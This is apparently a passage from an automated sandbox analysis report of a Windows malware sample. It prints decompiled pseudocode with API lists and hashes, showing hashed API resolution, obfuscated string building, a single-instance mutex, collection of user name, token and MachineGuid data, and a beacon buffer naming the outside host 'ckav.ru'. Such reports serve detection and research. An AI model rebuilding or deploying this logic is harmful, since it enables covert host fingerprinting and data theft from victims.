					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                    0x00404e1d
                    0x00404e26
                    0x00404e2a
                    0x00404e2f
                    0x00404e37
                    0x00404e3a
                    0x00404e45
                    0x00404e4f
                    0x00404e57
                    0x00404e61
                    0x00404e66
                    0x00404e68
                    0x00404e6c
                    0x00404e6e
                    0x00404e7a
                    0x00404e80
                    0x00404e84
                    0x00404e9f
                    0x00404ea7
                    0x00404eab
                    0x00404eb1
                    0x00404eb1
                    0x00404eb6
                    0x00404ebe
                    0x00404ecb
                    0x00000000
                    0x00404ec0
                    0x00404ec1
                    0x00404ec7
                    0x00404ec7
                    0x00404ecd
                    0x00000000
                    0x00404ece
                    0x00404ebe
                    0x00404e87
                    0x00404e90
                    0x00000000
                    0x00404e90
                    0x00000000

                    APIs
                    • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                    • socket.WS2_32(?,?,?,00000000,00000000), ref: 00404E7A
                    • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: freeaddrinfogetaddrinfosocket
                    • String ID:
                    • API String ID: 2479546573-0
                    • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                    • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                    • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                    • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 74%
                    			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                    0x004040c4
                    0x004040ce
                    0x004040d0
                    0x004040e8
                    0x004040ea
                    0x004040ec
                    0x004040f2
                    0x0040418d
                    0x00404190
                    0x00404184
                    0x00000000
                    0x00404184
                    0x004041a0
                    0x004041a5
                    0x004041a7
                    0x00000000
                    0x00000000
                    0x004041a9
                    0x004041b6
                    0x004041b8
                    0x004041be
                    0x004041cb
                    0x004041d0
                    0x004041d1
                    0x004041d3
                    0x004041d8
                    0x004041dc
                    0x00000000
                    0x004041e2
                    0x00404100
                    0x0040410c
                    0x00404111
                    0x0040417a
                    0x0040417a
                    0x00000000
                    0x0040411b
                    0x0040411b
                    0x00404120
                    0x00404122
                    0x00404122
                    0x0040412c
                    0x0040413a
                    0x0040413c
                    0x00404140
                    0x00000000
                    0x00404142
                    0x0040414a
                    0x00404155
                    0x0040415a
                    0x0040415e
                    0x00404168
                    0x00404174
                    0x00404176
                    0x00404176
                    0x0040417d
                    0x0040417e
                    0x00000000
                    0x00404183
                    0x00404140

                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: File$AllocCreateReadVirtual
                    • String ID: .tmp
                    • API String ID: 3585551309-2986845003
                    • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                    • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                    • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                    • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 79%
                    			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                    0x0041386f
                    0x0041387e
                    0x00413885
                    0x00413889
                    0x0041388c
                    0x00413890
                    0x00413893
                    0x00413897
                    0x0041389a
                    0x0041389e
                    0x004138a1
                    0x004138a5
                    0x004138a8
                    0x004138ac
                    0x004138af
                    0x004138b2
                    0x004138b5
                    0x004138b8
                    0x004138bb
                    0x004138bc
                    0x004138c4
                    0x004138c8
                    0x004138cb
                    0x004138cf
                    0x004138d2
                    0x004138d6
                    0x004138d7
                    0x004138df
                    0x004138e3
                    0x004138e4
                    0x004138ea
                    0x004138eb
                    0x004138f1
                    0x004138f5
                    0x004138f9
                    0x004138fd
                    0x00413901
                    0x00413905
                    0x00413909
                    0x0041390d
                    0x00413911
                    0x00413915
                    0x00413919
                    0x0041391d
                    0x00413921
                    0x00413925
                    0x00413929
                    0x0041392d
                    0x00413931
                    0x00413935
                    0x00413939
                    0x0041393d
                    0x00413941
                    0x00413950
                    0x00413959
                    0x0041395f
                    0x00413968
                    0x0041396e
                    0x00413973
                    0x00413977
                    0x00413979
                    0x00413980
                    0x00413982
                    0x00413991
                    0x0041399c
                    0x0041399e
                    0x004139a4
                    0x004139a9
                    0x004139ac
                    0x004139b1
                    0x004139b1
                    0x004139b2
                    0x004139b7
                    0x004139bc
                    0x004139c1
                    0x004139c7
                    0x004139cd
                    0x004139cd
                    0x004139db

                    APIs
                    • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                    • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                    • GetLastError.KERNEL32 ref: 0041399E
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Error$CreateLastModeMutex
                    • String ID:
                    • API String ID: 3448925889-0
                    • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                    • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                    0x004042cf
                    0x004042d5
                    0x004042df
                    0x004042e2
                    0x004042f9
                    0x004042fb
                    0x00404300
                    0x0040430a
                    0x00404314
                    0x00404319
                    0x00404323
                    0x00404334
                    0x0040433b
                    0x0040433b
                    0x0040433f
                    0x00404344
                    0x0040434c

                    APIs
                    • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                    • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: File$CreatePointerWrite
                    • String ID:
                    • API String ID: 3672724799-0
                    • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                    • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                    Download Yara Rule
                    C-Code - Quality: 34%
                    			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                    0x00412d31
                    0x00412d34
                    0x00412d39
                    0x00412d3c
                    0x00412d49
                    0x00412d50
                    0x00412d52
                    0x00412f24
                    0x00412f24
                    0x00412f2b
                    0x00412f30
                    0x00412f32
                    0x00412f37
                    0x00412f41
                    0x00412f53
                    0x00412f53
                    0x00412f5b
                    0x00412f60
                    0x00412d58
                    0x00412d58
                    0x00412d63
                    0x00412d6c
                    0x00412d73
                    0x00412d7e
                    0x00412d7f
                    0x00412d80
                    0x00412d81
                    0x00412d82
                    0x00412d8f
                    0x00412da1
                    0x00412da6
                    0x00412dae
                    0x00412db0
                    0x00412db1
                    0x00412db5
                    0x00412dce
                    0x00412dcf
                    0x00412dd5
                    0x00412dda
                    0x00412db7
                    0x00412db7
                    0x00412db8
                    0x00412dbe
                    0x00412dc4
                    0x00412dc9
                    0x00412dc9
                    0x00412de2
                    0x00412de4
                    0x00412de5
                    0x00412de7
                    0x00412de9
                    0x00412e02
                    0x00412e03
                    0x00412e09
                    0x00412e0e
                    0x00412deb
                    0x00412deb
                    0x00412dec
                    0x00412df2
                    0x00412df8
                    0x00412dfd
                    0x00412dfd
                    0x00412e11
                    0x00412e17
                    0x00412e19
                    0x00412e1a
                    0x00412e1e
                    0x00412e37
                    0x00412e38
                    0x00412e3e
                    0x00412e43
                    0x00412e20
                    0x00412e20
                    0x00412e21
                    0x00412e27
                    0x00412e2d
                    0x00412e32
                    0x00412e32
                    0x00412e4b
                    0x00412e4d
                    0x00412e4f
                    0x00412e7e
                    0x00412e8a
                    0x00412e8f
                    0x00412e51
                    0x00412e59
                    0x00412e67
                    0x00412e6d
                    0x00412e72
                    0x00412e72
                    0x00412e9e
                    0x00412eaf
                    0x00412eb4
                    0x00412ec0
                    0x00412ece
                    0x00412edc
                    0x00412eea
                    0x00412ef8
                    0x00412f0f
                    0x00412f14
                    0x00412f14
                    0x00412f17
                    0x00412f1d
                    0x00412f1f
                    0x00000000
                    0x00412f1f
                    0x00412f74

                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                      • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                      • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                      • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Heap$CreateFreeProcessThread_wmemset
                    • String ID: ckav.ru
                    • API String ID: 2915393847-2696028687
                    • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                    • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                    • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                    • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                    0x00406340
                    0x00406345
                    0x00406373
                    0x00406373
                    0x00406347
                    0x0040634f
                    0x00406354
                    0x00406357
                    0x0040635c
                    0x00406366
                    0x0040636d
                    0x00000000
                    0x00406368
                    0x00406368
                    0x00406368
                    0x00406366
                    0x0040637a

                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • _wmemset.LIBCMT ref: 0040634F
                      • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser_wmemset
                    • String ID: CA
                    • API String ID: 2078537776-1052703068
                    • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                    • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                    • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                    • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                    0x00406094
                    0x004060a8
                    0x004060ab

                    APIs
                    • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: InformationToken
                    • String ID: IDA
                    • API String ID: 4114910276-365204570
                    • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                    • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                    0x00402c10
                    0x00402c15
                    0x00402c1b
                    0x00402c1e

                    APIs
                    • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: AddressProc
                    • String ID: s1@
                    • API String ID: 190572456-427247929
                    • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                    • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}









                    0x00404a56
                    0x00404a65
                    0x00404a6a
                    0x00404ad1
                    0x00404ad1
                    0x00404a6c
                    0x00404a71
                    0x00404a79
                    0x00404a85
                    0x00404a9a
                    0x00404a9e
                    0x00404acb
                    0x00000000
                    0x00404aa0
                    0x00404aac
                    0x00404abc
                    0x00404ac1
                    0x00404ac6
                    0x00404ac6
                    0x00404a9e
                    0x00404ad9

                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
